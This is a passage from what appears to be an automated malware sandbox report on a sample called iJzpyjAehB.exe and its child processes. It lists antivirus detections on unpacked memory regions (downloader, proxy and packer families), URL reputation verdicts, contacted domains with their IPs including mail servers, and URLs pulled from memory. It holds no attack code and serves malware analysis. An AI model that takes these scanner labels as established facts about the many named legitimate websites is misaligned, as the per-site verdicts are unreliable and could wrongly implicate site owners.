                      15.2.svchost.exe.4000000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      11.3.svchost.exe.54a0000.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      12.2.svchost.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.2.iJzpyjAehB.exe.2381e88.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      13.2.svchost.exe.7e670000.1.unpack100%AviraTR/ATRAPS.GenDownload File
                      6.2.pigalicapi.exe.31a0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.2.pigalicapi.exe.7e1e88.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      11.3.svchost.exe.2df0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      23.2.svchost.exe.13140000.1.unpack100%AviraTR/Proxy.GenDownload File
                      12.2.svchost.exe.406b200.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      10.3.svchost.exe.55e0000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      25.2.svchost.exe.4000000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      2.3.pigalicapi.exe.30a0000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      6.2.pigalicapi.exe.10004088.9.unpack100%AviraTR/Patched.Ren.GenDownload File
                      2.2.pigalicapi.exe.400e290.10.unpack100%AviraTR/Downloader.GenDownload File
                      10.3.svchost.exe.54a0000.2.unpack100%AviraTR/Proxy.GenDownload File
                      0.2.iJzpyjAehB.exe.400e290.10.unpack100%AviraTR/Downloader.GenDownload File
                      10.2.svchost.exe.4000000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.3.iJzpyjAehB.exe.23b0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      13.2.svchost.exe.4000000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      11.3.svchost.exe.54a0000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      12.3.svchost.exe.54a0000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                      10.3.svchost.exe.3550000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://www.lanouvelle.net/Economie/Affaires/2007-12-12/article-1328994/Deux-nouveaux-batiments-comme0%Avira URL Cloudsafe
                      http://pohlfood.com/wp-includes/js/wp-util.min.js?ver=26698c2509d8a9f37e69464fad7be5f10%Avira URL Cloudsafe
                      http://www.indonesiamedia.com/wp-content/uploads/2021/07/logo.png0%Avira URL Cloudsafe
                      https://www.pcgrate.com/#webpage0%Avira URL Cloudsafe
                      http://www.dgmna.com/u0%Avira URL Cloudsafe
                      http://a-domani.com/0%Avira URL Cloudsafe
                      https://pohlfood.com/#website0%Avira URL Cloudsafe
                      http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc0%Avira URL Cloudsafe
                      http://skypearl.com/0%Avira URL Cloudsafe
                      https://inhouse.pohlfood.com/0%Avira URL Cloudsafe
                      http://fdlymca.org/0%Avira URL Cloudsafe
                      http://gpthink.com/product/204.html0%Avira URL Cloudsafe
                      http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.js0%Avira URL Cloudsafe
                      http://pohlfood.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.11.00%Avira URL Cloudsafe
                      http://www.stajum.com/20%Avira URL Cloudsafe
                      http://univi.it/0%Avira URL Cloudsafe
                      http://likangds.com/0%Avira URL Cloudsafe
                      https://www.pwd.org/0%Avira URL Cloudsafe
                      http://www.valselit.com/174-appartement-a-vendre-grenoble-305140%Avira URL Cloudsafe
                      http://www.elpro.si/0%Avira URL Cloudsafe
                      http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/js/gpls_woo_rfq.js?ver0%Avira URL Cloudsafe
                      http://www.credo.edu.pl/100%Avira URL Cloudmalware
                      http://sigtoa.com/0%Avira URL Cloudsafe
                      https://pohlfood.com/comments/feed/0%Avira URL Cloudsafe
                      http://www.indonesiamedia.com/contact-us/0%Avira URL Cloudsafe
                      http://www.pwd.org/M0%Avira URL Cloudsafe
                      https://www.aevga.com/0%Avira URL Cloudsafe
                      http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.pdfservice.min.js?ver=3.250%Avira URL Cloudsafe
                      http://www.naoi-a.com/0%Avira URL Cloudsafe
                      http://www.myropcb.com/services-capabilities/pcb-restoration/0%Avira URL Cloudsafe
                      http://www.abdg.com/0%Avira URL Cloudsafe
                      http://hes.pt/0%Avira URL Cloudsafe
                      http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.10%Avira URL Cloudsafe
                      http://www.pwd.org/_0%Avira URL Cloudsafe
                      http://www.myropcb.com/services-capabilities/stencil/0%Avira URL Cloudsafe
                      http://www.valselit.com/177-appartement-a-vendre-sigean-303780%Avira URL Cloudsafe
                      http://www.myropcb.com/why-use-myro/0%Avira URL Cloudsafe
                      http://gholographic.com/0%Avira URL Cloudsafe
                      http://www.pcgrate.com/wp-content/themes/dt-the7/js/main.min.js?ver=9.12.00%Avira URL Cloudsafe
                      http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/css.min.css?ver=2.1.00%Avira URL Cloudsafe
                      http://calvinly.com/0%Avira URL Cloudsafe
                      https://www.ora-ito.com/0%Avira URL Cloudsafe
                      https://tickets.suresupport.com/faq/article-1596/en0%Avira URL Cloudsafe
                      http://zugseil.com/0%Avira URL Cloudsafe
                      http://www.indonesiamedia.com/wp-content/themes/mag-theme/style.css?ver=4.9.220%Avira URL Cloudsafe
                      http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)0%Avira URL Cloudsafe
                      http://www.pcgrate.com/wp-content/uploads/the7-css/css-vars.css?ver=899328ee298e0%Avira URL Cloudsafe
                      http://ruzee.com/0%Avira URL Cloudsafe
                      http://myropcb.com/login/0%Avira URL Cloudsafe
                      http://www.winhui.cn/template/default/img/fixedimg4.png0%Avira URL Cloudsafe
                      http://redgiga.com/0%Avira URL Cloudsafe
                      http://www.pcgrate.com/wp-content/uploads/elementor/css/post-1009.css?ver=16772570130%Avira URL Cloudsafe
                      http://www.jenco.co.uk/W0%Avira URL Cloudsafe
                      https://pohlfood.com/wp-content/uploads/iStock-1031193710b.jpg0%Avira URL Cloudsafe
                      https://pohlfood.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpohlfood.com%2F0%Avira URL Cloudsafe
                      http://pohlfood.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.10.30%Avira URL Cloudsafe
                      http://www.indonesiamedia.com/wp-content/themes/mag-theme/images/body-BG.png0%Avira URL Cloudsafe
                      http://www.jenco.co.uk/n0%Avira URL Cloudsafe
                      http://www.myropcb.com/why-use-myro/terms-of-service/0%Avira URL Cloudsafe
                      http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.70%Avira URL Cloudsafe
                      http://www.pcgrate.com0%Avira URL Cloudsafe
                      http://www.ora-ito.com/0%Avira URL Cloudsafe
                      http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.3.0%Avira URL Cloudsafe
                      http://umcor.am/0%Avira URL Cloudsafe
                      http://shanks.co.uk/0%Avira URL Cloudsafe
                      https://www.naoi-a.com/0%Avira URL Cloudsafe
                      http://www.rsag.infod0%Avira URL Cloudsafe
                      http://arowines.com/0%Avira URL Cloudsafe
                      http://www.jenco.co.uk/s0%Avira URL Cloudsafe
                      https://dataform.co.uk/wp-signup.php?new=magicomm.co.uk0%Avira URL Cloudsafe
                      http://www.speelhal.net/R0%Avira URL Cloudsafe
                      https://www.pcgrate.com0%Avira URL Cloudsafe
                      http://oozkranj.com/0%Avira URL Cloudsafe
                      http://www.myropcb.com/wp-content/themes/framePCB/images/shopping_car.png0%Avira URL Cloudsafe
                      http://oaith.ca/0%Avira URL Cloudsafe
                      http://ramkome.com/0%Avira URL Cloudsafe
                      http://vonparis.com/0%Avira URL Cloudsafe
                      http://www.mobilnic.net/upload/img/201905280859514872.png0%Avira URL Cloudsafe
                      http://uhsa.edu.ag/0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      holp-ai.com
                      59.106.13.169
                      truefalse
                        high
                        impexnc.com
                        204.11.56.48
                        truefalse
                          high
                          webways.com
                          188.114.97.3
                          truefalse
                            high
                            www.fcwcvt.org
                            188.114.96.3
                            truefalse
                              high
                              dayvo.com
                              188.114.96.3
                              truefalse
                                high
                                hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
                                3.130.204.160
                                truefalse
                                  high
                                  enguita.net
                                  195.5.116.23
                                  truefalse
                                    high
                                    15.204.18.132.datacname.com
                                    15.204.18.132
                                    truefalse
                                      high
                                      dataform.co.uk
                                      83.223.113.46
                                      truefalse
                                        high
                                        shteeble.com
                                        185.106.129.180
                                        truefalse
                                          high
                                          evcpa.com
                                          192.124.249.10
                                          truefalse
                                            high
                                            shittas.com
                                            43.246.117.171
                                            truefalse
                                              high
                                              kallman.net
                                              185.76.64.25
                                              truefalse
                                                high
                                                bible.org
                                                104.20.54.214
                                                truefalse
                                                  high
                                                  missnue.com
                                                  104.21.234.121
                                                  truefalse
                                                    high
                                                    gphpedit.org
                                                    127.0.0.1
                                                    truefalse
                                                      high
                                                      jsaps.com
                                                      49.212.235.59
                                                      truefalse
                                                        high
                                                        avse.hu
                                                        185.129.138.60
                                                        truefalse
                                                          high
                                                          pohlfood.com
                                                          104.218.10.254
                                                          truefalse
                                                            high
                                                            notis.ru
                                                            185.178.208.141
                                                            truefalse
                                                              high
                                                              canasil.com
                                                              172.67.68.180
                                                              truefalse
                                                                high
                                                                www.jenco.co.uk
                                                                104.21.23.9
                                                                truefalse
                                                                  high
                                                                  www.tyrns.com
                                                                  62.75.216.137
                                                                  truefalse
                                                                    high
                                                                    nts-web.net
                                                                    49.212.235.175
                                                                    truefalse
                                                                      high
                                                                      willsub.com
                                                                      69.89.107.122
                                                                      truefalse
                                                                        high
                                                                        shesfit.com
                                                                        188.114.97.3
                                                                        truefalse
                                                                          high
                                                                          ldh.la.gov
                                                                          75.2.95.235
                                                                          truefalse
                                                                            high
                                                                            www.vexcom.com
                                                                            172.67.173.200
                                                                            truefalse
                                                                              high
                                                                              cpmteam.com
                                                                              188.114.97.3
                                                                              truefalse
                                                                                high
                                                                                tcpoa.com
                                                                                159.89.244.183
                                                                                truefalse
                                                                                  high
                                                                                  kevyt.net
                                                                                  104.21.2.101
                                                                                  truefalse
                                                                                    high
                                                                                    www.mobilnic.net
                                                                                    154.203.14.100
                                                                                    truefalse
                                                                                      high
                                                                                      s5w.com
                                                                                      192.99.226.184
                                                                                      truefalse
                                                                                        high
                                                                                        www.sclover3.com
                                                                                        157.112.182.239
                                                                                        truefalse
                                                                                          high
                                                                                          in1.smtp.messaginguser.com
                                                                                          66.111.4.70
                                                                                          truefalse
                                                                                            high
                                                                                            paraski.org
                                                                                            94.130.164.242
                                                                                            truefalse
                                                                                              high
                                                                                              dog-jog.net
                                                                                              153.122.24.177
                                                                                              truefalse
                                                                                                high
                                                                                                kamptal.at
                                                                                                128.204.134.138
                                                                                                truefalse
                                                                                                  high
                                                                                                  bd-style.com
                                                                                                  107.165.223.27
                                                                                                  truefalse
                                                                                                    high
                                                                                                    ora.ecnet.jp
                                                                                                    60.43.154.138
                                                                                                    truefalse
                                                                                                      high
                                                                                                      adventist.ro
                                                                                                      172.67.183.62
                                                                                                      truefalse
                                                                                                        high
                                                                                                        www.edimart.hu
                                                                                                        81.2.194.241
                                                                                                        truefalse
                                                                                                          high
                                                                                                          zupraha.cz
                                                                                                          77.78.104.3
                                                                                                          truefalse
                                                                                                            high
                                                                                                            isom.org
                                                                                                            192.124.249.14
                                                                                                            truefalse
                                                                                                              high
                                                                                                              any-s.net
                                                                                                              185.104.28.238
                                                                                                              truefalse
                                                                                                                high
                                                                                                                muhr-soehne.de
                                                                                                                5.189.171.125
                                                                                                                truefalse
                                                                                                                  high
                                                                                                                  www.railbook.net
                                                                                                                  81.171.22.7
                                                                                                                  truefalse
                                                                                                                    high
                                                                                                                    hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com
                                                                                                                    54.161.222.85
                                                                                                                    truefalse
                                                                                                                      high
                                                                                                                      oaith.ca
                                                                                                                      192.124.249.12
                                                                                                                      truefalse
                                                                                                                        high
                                                                                                                        akr.co.id
                                                                                                                        172.67.33.252
                                                                                                                        truefalse
                                                                                                                          high
                                                                                                                          shztm.ru
                                                                                                                          52.50.65.32
                                                                                                                          truefalse
                                                                                                                            high
                                                                                                                            www.abdg.com
                                                                                                                            192.252.154.18
                                                                                                                            truefalse
                                                                                                                              high
                                                                                                                              www.spanesi.com
                                                                                                                              5.196.166.214
                                                                                                                              truefalse
                                                                                                                                high
                                                                                                                                aiolos-sa.gr
                                                                                                                                188.114.96.3
                                                                                                                                truefalse
                                                                                                                                  high
                                                                                                                                  usadig.com
                                                                                                                                  198.100.146.220
                                                                                                                                  truefalse
                                                                                                                                    high
                                                                                                                                    metaforacom.com
                                                                                                                                    185.42.105.162
                                                                                                                                    truefalse
                                                                                                                                      high
                                                                                                                                      dhh.la.gov
                                                                                                                                      52.200.51.73
                                                                                                                                      truefalse
                                                                                                                                        high
                                                                                                                                        gmail-smtp-in.l.google.com
                                                                                                                                        142.250.27.27
                                                                                                                                        truefalse
                                                                                                                                          high
                                                                                                                                          fdlymca.org
                                                                                                                                          192.124.249.9
                                                                                                                                          truefalse
                                                                                                                                            high
                                                                                                                                            smtp1.sbc.mail.am0.yahoodns.net
                                                                                                                                            66.163.170.48
                                                                                                                                            truefalse
                                                                                                                                              high
                                                                                                                                              assideum.com
                                                                                                                                              52.219.178.104
                                                                                                                                              truefalse
                                                                                                                                                high
                                                                                                                                                www.hyabmagneter.se
                                                                                                                                                172.67.209.90
                                                                                                                                                truefalse
                                                                                                                                                  high
                                                                                                                                                  cbras.com
                                                                                                                                                  54.39.198.18
                                                                                                                                                  truefalse
                                                                                                                                                    high
                                                                                                                                                    atbauk.org
                                                                                                                                                    104.21.92.170
                                                                                                                                                    truefalse
                                                                                                                                                      high
                                                                                                                                                      bidroll.com
                                                                                                                                                      13.56.33.8
                                                                                                                                                      truefalse
                                                                                                                                                        high
                                                                                                                                                        www.vazir.se
                                                                                                                                                        206.191.152.37
                                                                                                                                                        truefalse
                                                                                                                                                          high
                                                                                                                                                          www.naoi-a.com
                                                                                                                                                          202.254.236.40
                                                                                                                                                          truefalse
                                                                                                                                                            high
                                                                                                                                                            d2r2uj0bnofxxz.cloudfront.net
                                                                                                                                                            143.204.9.49
                                                                                                                                                            truefalse
                                                                                                                                                              high
                                                                                                                                                              www.valselit.com
                                                                                                                                                              193.70.68.254
                                                                                                                                                              truefalse
                                                                                                                                                                high
                                                                                                                                                                vvsteknik.dk
                                                                                                                                                                185.31.76.90
                                                                                                                                                                truefalse
                                                                                                                                                                  high
                                                                                                                                                                  biosolve.com
                                                                                                                                                                  151.101.130.159
                                                                                                                                                                  truefalse
                                                                                                                                                                    high
                                                                                                                                                                    karmy.com.pl
                                                                                                                                                                    185.253.212.22
                                                                                                                                                                    truefalse
                                                                                                                                                                      high
                                                                                                                                                                      www.fe-bauer.de
                                                                                                                                                                      3.65.101.129
                                                                                                                                                                      truefalse
                                                                                                                                                                        high
                                                                                                                                                                        smtp.mail.global.gm0.yahoodns.net
                                                                                                                                                                        87.248.97.36
                                                                                                                                                                        truefalse
                                                                                                                                                                          high
                                                                                                                                                                          vdoherty.com
                                                                                                                                                                          91.216.241.100
                                                                                                                                                                          truefalse
                                                                                                                                                                            high
                                                                                                                                                                            hbfuels.com
                                                                                                                                                                            85.233.160.148
                                                                                                                                                                            truefalse
                                                                                                                                                                              high
                                                                                                                                                                              pb-games.com
                                                                                                                                                                              173.254.28.29
                                                                                                                                                                              truefalse
                                                                                                                                                                                high
                                                                                                                                                                                mackusick.de
                                                                                                                                                                                217.160.0.131
                                                                                                                                                                                truefalse
                                                                                                                                                                                  high
                                                                                                                                                                                  ncn.de
                                                                                                                                                                                  46.30.60.158
                                                                                                                                                                                  truefalse
                                                                                                                                                                                    high
                                                                                                                                                                                    nekono.net
                                                                                                                                                                                    202.172.28.187
                                                                                                                                                                                    truefalse
                                                                                                                                                                                      high
                                                                                                                                                                                      fnw.us
                                                                                                                                                                                      137.118.26.67
                                                                                                                                                                                      truefalse
                                                                                                                                                                                        high
                                                                                                                                                                                        komie.com
                                                                                                                                                                                        59.106.13.181
                                                                                                                                                                                        truefalse
                                                                                                                                                                                          high
                                                                                                                                                                                          ftmobile.com
                                                                                                                                                                                          199.34.228.78
                                                                                                                                                                                          truefalse
                                                                                                                                                                                            high
                                                                                                                                                                                            www.x0c.com
                                                                                                                                                                                            185.53.177.50
                                                                                                                                                                                            truefalse
                                                                                                                                                                                              high
                                                                                                                                                                                              onzcda.com
                                                                                                                                                                                              35.186.238.101
                                                                                                                                                                                              truefalse
                                                                                                                                                                                                high
                                                                                                                                                                                                sledsport.ru
                                                                                                                                                                                                185.22.232.175
                                                                                                                                                                                                truefalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  www.findbc.com
                                                                                                                                                                                                  13.248.216.40
                                                                                                                                                                                                  truefalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    tbvlugus.nl
                                                                                                                                                                                                    174.129.25.170
                                                                                                                                                                                                    truefalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      cubodown.com
                                                                                                                                                                                                      104.21.30.14
                                                                                                                                                                                                      truefalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        infotech.pl
                                                                                                                                                                                                        79.96.32.254
                                                                                                                                                                                                        truefalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          pellys.co.uk
                                                                                                                                                                                                          77.72.4.226
                                                                                                                                                                                                          truefalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            semuk.com
                                                                                                                                                                                                            52.128.23.153
                                                                                                                                                                                                            truefalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              tozzhin.com
                                                                                                                                                                                                              202.94.166.30
                                                                                                                                                                                                              truefalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                tabbles.net
                                                                                                                                                                                                                188.114.97.3
                                                                                                                                                                                                                truefalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  cqdgroup.com
                                                                                                                                                                                                                  221.132.33.88
                                                                                                                                                                                                                  truefalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    www.muhr-soehne.de
                                                                                                                                                                                                                    5.189.171.125
                                                                                                                                                                                                                    truefalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      fortknox.bm
                                                                                                                                                                                                                      216.177.137.32
                                                                                                                                                                                                                      truefalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        camamat.com
                                                                                                                                                                                                                        104.21.235.32
                                                                                                                                                                                                                        truefalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          mail.airmail.net
                                                                                                                                                                                                                          66.226.70.66
                                                                                                                                                                                                                          truefalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            ikulani.com
                                                                                                                                                                                                                            157.7.107.88
                                                                                                                                                                                                                            truefalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                              http://skypearl.com/true
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://a-domani.com/true
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://fdlymca.org/true
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://univi.it/true
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://likangds.com/true
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://www.elpro.si/false
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://www.credo.edu.pl/false
                                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://sigtoa.com/true
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://dhh.la.gov/false
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                http://www.naoi-a.com/false
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://www.abdg.com/false
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://hes.pt/true
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://calvinly.com/false
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://zugseil.com/true
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://ruzee.com/true
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://redgiga.com/false
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://www.ora-ito.com/false
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://umcor.am/true
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://shanks.co.uk/true
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://arowines.com/true
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://dataform.co.uk/wp-signup.php?new=magicomm.co.uktrue
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://oozkranj.com/true
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://oaith.ca/true
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://vonparis.com/true
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://ramkome.com/true
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://uhsa.edu.ag/true
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                                https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-260x95.jpgiJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  http://www.indonesiamedia.com/wp-content/uploads/2021/07/logo.pngsvchost.exe, 00000016.00000003.496913823.000000000332A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://www.lanouvelle.net/Economie/Affaires/2007-12-12/article-1328994/Deux-nouveaux-batiments-commeiJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.484497313.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.398318769.0000000002DE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://pohlfood.com/wp-includes/js/wp-util.min.js?ver=26698c2509d8a9f37e69464fad7be5f1iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://www.dgmna.com/upigalicapi.exe, 00000006.00000003.338019640.0000000007540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wciJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://pohlfood.com/#websiteiJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://www.pcgrate.com/#webpageiJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://inhouse.pohlfood.com/iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-300.eot?#iefixiJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://com-sit.com/leistungen/intelligent-sourcing/iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
